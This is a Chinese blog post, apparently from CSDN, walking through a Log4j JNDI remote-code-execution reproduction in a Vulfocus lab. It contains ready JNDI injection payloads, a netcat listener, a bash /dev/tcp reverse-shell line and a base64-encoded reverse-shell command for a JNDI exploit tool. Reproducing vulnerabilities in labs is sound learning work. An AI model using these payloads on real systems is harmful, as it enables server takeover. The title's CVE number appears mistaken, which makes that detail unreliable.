CVE-2024-44228——Vulfocus-Log4j RCE漏洞复现_vulfous中cve-2024-44228

最新推荐文章于 2024-11-02 10:37:58 发布
最新推荐文章于 2024-11-02 10:37:58 发布
阅读量209 收藏
点赞数 1
文章标签: log4j
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_87298459/article/details/142422385
版权 
+ [Vuofocus](#Vuofocus_40)
+ [Dnslog出网测试](#Dnslog_50)
+ [JNDI注入反弹shell](#JNDIshell_74)

漏洞描述

在这里插入图片描述
Apache Log4j2 是 Apache 软件基金会下的一个开源的基于 Java 的日志记录工具。Log4j2 是一个 Log4j 1.x 的 重写,并且引入了大量丰富的特
性。该日志框架被大量用于业务系统开发,用来记录日志信息。由于其优异的性能 而被广泛的应用于各种常见的 Web 服务中。

漏洞评级

Apache Log4j 远程代码执行漏洞 :严重

在这里插入图片描述

影响范围

https://fofa.so/static\_pages/log4j2

在这里插入图片描述
在这里插入图片描述

Apache log4j2 2.\* <= Apache log4j2 2.15.1.rc1

主流相关产品

Spring-Boot-strater-log4j2

Apache Struts2

Apache Solr

Apache Flink

Apache Druid

ElasticSearch

Vuofocus

http://vulfocus.fofa.so/

在这里插入图片描述
启动靶场
在这里插入图片描述
在这里插入图片描述

Dnslog出网测试

http://www.dnslog.cn/

payload GET方式提交
在这里插入图片描述

payload

payload=${jndi:ldap://X.X.X.X/exp}
payload=${jndi:ldap://5e0s0v.dnslog.cn/exp}

用payload打的时候发现服务器返回404
原因是因为GET数据传输要URL编码
*在这里插入图片描述*

在这里插入图片描述
URL编码后提交正常
在这里插入图片描述
DNSlog成功回显
在这里插入图片描述

JNDI注入反弹shell

JNDI

https://github.com/welk1n/JNDI-Injection-Exploit/blob/master/README-CN.md

VPS监听端口

nc -lvp 7777

在这里插入图片描述
JNDI注入
在这里插入图片描述

替换JNDI中对应的payload
在这里插入图片描述
在这里插入图片描述

反弹shell

bash -i >& /dev/tcp/ip/port 0>&1


java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar  -C bash -c "{echo,YmFzaCAtaSA+JiAvZGV2L3RjcCUuMjQuOTUuMi83Nzc3IDA+JjE=}|{base64,-d}|{bash,-i}"  -A   [vps ip]

反弹shell命令进行了base64编码

2401_87298459
关注
Log4J2漏洞CVE-2024-44228)原理_log4j2漏洞原理,2024年最新快手网络安全面试
2401_83621004的博客
04-15 867
Apache Log4j2是一个基于Java的日志记录工具,当前被广泛应用于业务系统开发,开发 者可以利用该工具将程序的输入输出信息进行日志记录。2021年11月24日,阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏 洞。该漏洞是由于Apache Log4j2某些功能存在递归解析功能,导致攻击者可直接构造恶 意请求,触发远程代码执行漏洞,从而获得目标服务器权限。漏洞适应版本:2.0
刚刚公布的 Log4J 的史诗级安全漏洞 CVE-2024-44228 你处理了吗?(2)
2401_82645688的博客
05-08 971
是一个应用非常广泛的Java库,就在前两天的2021年12月10日,Log4J的一个安全漏洞被公布了。那天正好是周五,很多程序员都在计划着怎么度过一个愉快的周末,不料这个安全漏洞的公开,使得全世界很多程序员不得不周末加班,有的甚至通宵达旦紧急应对。然后使用 Log4j 输出一段日志,利用这个漏洞的前提是日志信息是可以由攻击者控制的,比如在代码打印了HTTP请求的参数或者Header等等,攻击者可以在请求参数或者Header输入如下JNDI Url。如下示例在构造方法启动了Mac的计算器程序。
log4j远程代码执行(CVE-2024-44228),阿里面试官必问
2401_83621004的博客
04-15 845
16、mysql的innodb如何定位锁问题,mysql如何减少主从复制延迟?2、在工作,运维人员经常需要跟运营人员打交道,请问运营人员是做什么工作的?6、Squid、Varinsh和Nginx有什么区别,工作你怎么选择?5、LVS、Nginx、HAproxy有什么区别?9、讲述一下Tomcat8005、8009、8080三个端口的含义?7、Tomcat和Resin有什么区别,工作你怎么选择?14、讲一下Keepalived的工作原理?15、讲述一下LVS三种模式的工作过程?
Apache Log4j2远程代码执行漏洞CVE-2021-44228复现
qq_40640917的博客
01-10 2536
Apache Log4j2 存在远程代码执行漏洞,该漏洞是由于Apache Log4j2某些功能存在递归解析功能,未经身份验证的攻击者通过发送特定恶意数据包,可在目标服务器上执行任意代码。Apache Log4j2是一个开源的Java日志框架,被广泛地应用在间件、开发框架与Web应用。攻击机参数:Kali(或安装有msfconsole的任意Linux/Windows操作系统)靶机容器:vulfocus/log4j2-rce-2021-12-09。靶机参数:Centos8.1。
Log4j2漏洞复现CVE-2021-44228
鹿鸣天涯
01-13 658
Apache Log4j是一个基于Java的日志记录组件,通过重写Log4j引入了丰富的功能特性,该日志组件被广泛应用于业务系统开发,用以记录程序输入输出日志信息。Apache Log4j2存在远程代码执行漏洞,攻击者可利用该漏洞向目标服务器发送精心构造的恶意数据,触发Log4j2组件解析缺陷,实现目标服务器的任意代码执行,获得目标服务器权限。
CVE-2021-44228——Vulfocus-Log4j RCE漏洞复现
热门推荐
LiBai'S BLOG
01-05 2万+
这里写目录标题VuofocusDnslog出网测试JNDI注入反弹shell Vuofocus http://vulfocus.fofa.so/ 启动靶场 Dnslog出网测试 http://www.dnslog.cn/ payload GET方式提交 payload payload=${jndi:ldap://X.X.X.X/exp} payload=${jndi:ldap://5e0s0v.dnslog.cn/exp} 用payload打的时候发现服务器返回404 原因是因为GET数据传输
CVE-2021-44228——Vulfocus-Log4j RCE漏洞复现_vulfouscve-2021-44228
2401_84519907的博客
05-16 364
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!内容实在太多,不一一截图了。
CVE-2021-44228——Vulfocus-Log4j RCE漏洞复现_vulfouscve-2021-44228(1)
2401_84519859的博客
05-16 290
需要这份系统化资料的朋友,可以点击这里获取](https://bbs.csdn.net/topics/618540462)**用payload打的时候发现服务器返回404。反弹shell命令进行了base64编码。原因是因为GET数据传输要URL编码。替换JNDI对应的payload。payload GET方式提交。反弹shell成功拿到flag。URL编码后提交正常。DNSlog成功回显。
log4j2漏洞原理分析及复现-CVE-2021-44228vulfocus靶场)
yang1234567898的博客
04-18 3251
搭建靶场: docker pull vulfocus/log4j2-rce-2021-12-09 //拉取靶场镜像 docker run -tid -p 38080:8080 vulfocus/log4j2-rce-2021-12-09 //运行靶场镜像 搭建成功! 利用漏洞 已经漏洞存在的情况下,构造攻击payload执行命令反弹shell bash -i >& /dev/tcp/192.168.96.166/1234 0>&1 由于...
CVE-2021-44228——Log4j2-RCE漏洞复现
「 虚幻私塾」
01-20 697
Python微信订餐小程序课程视频 https://edu.csdn.net/course/detail/36074 Python实战量化交易理财系统 https://edu.csdn.net/course/detail/35475 0x00 漏洞介绍 Apache Log4j2是一个Java的日志组件,在特定的版本由于其启用了lookup功能,从而导致产生远程代码执行漏洞。 影响版本:Apache Log4j2 2.0-beta9 - 2.15.0(不包括安全版本 2.12.2、2.12.3 和 2.3
CVE-2021-44228 log4j RCE漏洞原理详细分析排查和修补
m0_61506558的博客
09-14 1464
影响范围和排查方法1、CVE-2021-44228影响版本使用了log4j的组件,并且版本在 2.x
Log4j CVE-2021-44228 漏洞及Spring Boot解决方案
oscar999的专栏
12-17 2126
Log4j 的2 到 2.14 版本最近爆出了一个比较大的漏洞漏洞编号是CVE-2021-44228。本篇对该漏洞进行简单介绍, 并介绍Spring Boot项目如何解决该漏洞
log4j2-rce漏洞复现(CVE-2021-44228)
Z_l123的博客
04-01 2245
漏洞介绍 Apache Log4j2是一个Java的日志组件,在特定的版本由于其启用了lookup功能,从而导致产生远程代码执行漏洞。 影响版本:Apache Log4j2 2.0-beta9 - 2.15.0(不包括安全版本 2.12.2、2.12.3 和 2.3.1) 漏洞编号:CVE-2021-44228 漏洞复现 利用vulfocus搭建并启动靶场 DNSLog验证 通过DNSLog Platform平台获取到域名skvgq7.dnslog.cn,构造payload:${jndi
Log4j2注入漏洞(CVE-2021-44228)万字深度剖析(二)—漏洞原理
跳小闹成长记
12-14 1万+
本文将和大家一起对Log4j2的漏洞进行全面深入的剖析。我们将从如下几个方面进行讲解。 1、Log4j2漏洞的基本原理 2、Log4j2漏洞在Java高低版本的不同攻击原理 3、Log4j2漏洞在Java高低版本的攻击步骤 4、Log4j2漏洞在2.15.0-RC1被绕过的原因 5、Log4j2最终修复方案(2.15.0)的原理
Nop平台核心代码阅读导引
canonical的博客
10-30 1182
Nop平台核心引擎的实现代码都很简短,一般模块的核心代码量都是5000行左右的量级,只有ORM比较复杂一些,1万多行。虽然代码很短,实际实现的功能特性却很多,要把所有细节设计都介绍到,文档量还是不小。建议有问题可以先查看源码,核心特性都有单元测试支持,可以通过调试单元测试来学习源码(直接在关键类加断点,然后沿着堆栈向上看)。Nop平台所有的设计都非常简单直接,一般核心代码集在少数几个类
Spring框架
2301_80768157的博客
10-31 960
spring是轻量级的开源javaee框架,Spring可以解决企业应用开发的复杂性。
第三百零八节 Log4j教程 - Log4j日志到数据库
最新发布
2301_78772942的博客
11-02 570
第三百零八节 Log4j教程 - Log4j日志到数据库
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值